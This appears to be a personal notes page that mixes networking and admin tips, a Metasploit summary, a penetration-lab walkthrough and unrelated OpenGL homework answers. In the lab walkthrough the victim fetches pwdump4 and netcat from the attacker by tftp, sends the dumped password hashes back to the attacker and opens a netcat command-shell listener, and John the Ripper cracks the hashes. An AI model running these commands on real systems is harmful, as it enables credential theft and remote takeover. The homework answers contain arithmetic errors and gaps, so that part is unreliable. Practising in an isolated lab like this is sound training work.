John The Ripper

http://www.osix.net/modules/article/index.php?id=455

Change VMWare Mac Address

1. edit *.vmx file
2. change ethernet0.addressType = "generated" to ethernet0.addressType = "static"
3. change ethernet0.generatedAddress = "00:0c:29:x:x:x" to ethernet0.Address = "00:0c:29:x:x:x"

VMWare Mac Address are:

000569 Vmware
000C29 VMware
005056 VMWare

000C53 Private
00:0C:53

http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=507
http://virtrix.blogspot.com/2007/04/vmware-configuring-static-mac-address.html

IP Header, ICMP

Application Security Assessment Methodology

http://www.bgdsoftware.com/security/security_assessment.htm
http://www.counterpane.com/application-security-assessment.html

hping, the packet crafter

tcpdump, the packet analyzer

-n	Don’t resolve hostnames
-nn	Don’t resolve hostnames @ port names
-X	Show the packet’s content in both hex & ASCII
-v, -vv, -vvv	Increase the amount of packet information you get back
-c	Only get x number of packets and then stop
-S	Print absolute sequence numbers
-e	Get the Ethernet header as well

tcpdump –nS	Basic communication
tcpdump -nnvvS	Basic communication (very verbose)
tcpdump -nnvvSX	A deeper look at the traffic
tcpdump -nnvvSXs	Heavy packet viewing

http://dmiessler.com/study/tcpdump/

TCP Header

http://www.wtcs.org/snmp4tpc/literature.htm

VMWare Images


ISO Images

auditor-150405-04.iso
backtrack-v.1.0-260506.iso
ipcop-install-1.4.10.i386.iso
knoppix-std-0.1.iso
ubuntu-6.10-server-i386.iso

Installing an SSH Server on Windows

mkpasswd -l [-u ] >> ..\etc\passwd

http://www.netadmintools.com/art516.html

hping vs tcpdump (Packet Crafter vs Packet Analyzer / Sniffer)

prerequisite - you have to know the tcp ip layer, protocol & 3 way handshake

NETSH - Configure TCP/IP from the command line

Show TCP/IP setting	netsh interface ip show config
Configure static IP	netsh interface ip set address name="Local Area Connection" static 10.21.11.81 255.0.0.0 10.21.11.254 1
Configure DHCP client	netsh interface ip set address "Local Area Connection" dhcp
Configure DNS setting	netsh interface ip set dns "Local Area Connection" static 202.188.0.133
Configure DNS setting 2	netsh interface ip add dns "Local Area Connection" 202.188.1.5 index=2
Configure DNS by DHCP	netsh interface ip set dns "Local Area Connection" dhcp
Configure WINS setting	netsh interface ip set wins "Local Area Connection" static 192.168.0.200

http://www.petri.co.il/configure_tcp_ip_from_cmd.htm

http://thelazyadmin.com/blogs/thelazyadmin/archive/2005/04/04/Using-Netsh-to-Manage-Network-Interfaces-Part-2.aspx

http://cwashington.netreach.net/depo/view.asp?Index=1155&ScriptType=command

Configure IP Address on Backtrack

	Command to set	To confirm it
	ifconfig eth0 up
Set ip & subnet mask	ifconfig eth0 192.168.1.21 netmask 255.255.255.0	Ifconfig eth0
	route add default gw 192.168.1.1 eth0
	echo nameserver 192.168.1.1 > /etc/resolv.conf echo nameserver 212.135.1.36 >> /etc/resolv.conf

http://forums.remote-exploit.org/archive/index.php/t-1489.html

Check disk runs everytime I reboot my PC

the same problem with me...however, after follow the advice, i manage to solve it :)

fsutil dirty query e:
CHKNTFS /X e:
Chkdsk /f /r e:

http://www.experts-exchange.com/Hardware/Desktops/PCs/Q_22623541.html

Penetration Tester Lab

First of all, you must have your own machine to hack. In this scenario, i'll setup windows 2000 sp4 and linux redhat 6.2

this old version of linux can be download at

Download Redhat 6.2 here

Installing and Securing IIS Servers

The other machine is Backtrack that already installed into my hard disk for attacking purposes.
By default, windows 2000 sp4 is vulnerable to lsass exploit. So, make sure you patch your machine accordingly. In this lab, i won't patch it to show how the attack can be done.

Windows SP4 - 10.21.11.81
Backtrack (Attacker - 10.21.11.84)

On Backtrack, scan windows 2004 sp4 using nmap

nmap -sT -O 10.21.11.81
nmap -sV 10.21.11.81 -p 23,25,80
nmap -sU 10.21.11.81

cd /pentest/password/dictionaries
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt

exploit the machine...n get the shell.

From the windows 2004, run

tftp -i 10.21.11.84 get pwdump4.exe
tftp -i 10.21.11.84 get pwdump4.dll
tftp -i 10.21.11.84 get nc.exe

pwdump4 /l /o:pwdump4.txt
tftp 10.21.11.84 put pwdump4.txt

From Backtrack,

cat pwdump4.txt
john -w:wordlist.txt pwdump4.txt
john --show pwdump4.txt
john -w:wordlist.txt -f:NT pwdump4.txt

From Windows,

nc -L -p 2111 -e cmd.exe
telnet 10.21.11.81 2111
whoami

that's it, and GAME OVER

Metasploit: 3.0-beta-dev Guide

Basic format for Metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP adress & port number
3. Pick the payload
4. Configure the payload with local IP address & port number
5. Check / Execute the exploit

Step	Command	Description
1	Show exploits	List all exploits
2	Use [exploit name]	Choose
3	Show payloads	To check all available payloads
4	Set PAYLOAD [payload name]	Set the payload
5	Show options	To check more option that can be set
6	Check	To check whether the host is exploitable or not
7	Exploit	Exploit the host

SQL Injection - Test your skills here

http://hackme.ntobjectives.com/sql_inject/login_get.php

Network-based Application Vulnerability Assessment

AppDetective(TM) – Application Security, Inc's (AppSecInc) network-based application vulnerability assessment solution that arms you with the tools needed to secure applications/databases against unauthorized external attacks, unauthorized internal access, password cracking, and various other attacks before they occur.

https://www.appsecinc.com/cgi-bin/download.pl?download=AppDetective

Computer Graphics with OpenGL 3rd Edition

2.4 Consider three different raster systems with resolutions of 640 by 480 ,1280 by 1024, and 2560 by 2048. what size frame buffer (in bytes ) is needed for each of these systems to store 12 bits per pixel? How much storage is required for each system if 24 bits per pixel are to be stored?

a) (640*480*12) / 8 = 460 800

b) (1280*1024*12) / 8 = 1 966 080

c) (2560*2048*12) / 8 = 7 864 320

d) (640*480*24) / 8 = 921 600

e) (1280*1024*24) / 8 = 3 932 160

f) (2560*2048*24) / 8 = 15 728 640

2.5 Suppose an RGB raster system is to be designed using an 8 inch by 10 inch screen with a resolution of 100 pixels per inch in each direction. If we want to store 6 bits per pixel in the frame buffer, how much storage(in bytes) do we need for the frame buffer?

(800*10000*6) / 8 byte = 60000000 bytes

2.6 How long would it take to load a 640 by 480 frame buffer with 12 bits per pixel, if 10^5 bits can be transferred per second? How long would it take to load a 24- bit per pixel frame buffer with a resolution of 1280 by 1024 using this same transfer rate?

Storage = 640*480*12 = 307200*12 = 3686400 bits

3686400 bits = 100000x

x = 3686400 bits / 100000

= 36.864 seconds

2.7 Suppose we have a computer with 32 bits per word and a transfer rate of 1 mip (one million instructions per second). How long would it take to fill the frame buffer of a 300 dpi(dot per inch) laser printer with a page size of 8 ½ inches by 11 inches?

2.8 Consider two raster systems with resolution of 640 by 480 and 1280 by 1024.how many pixels could be accessed per second in each of these systems by a display controller that refreshes the screen at a rate of 60 frames per second? What is the access time per pixel in each system?

60*640*480=18432000 pixels. 60*1024*1280=78643200 pixels.

2.9 suppose we have a video monitor with a display area that measures 12 inches across and 9.6 inches high. If the resolution is 1280 by 1024 and the aspect ration is 1, what is the diameter of each screen point?

2.10 How much time is spent scanning across each row of pixels during screen refresh on a raster system with a resolution of 1280 by 1024 and a refresh rate of 60k frames per second?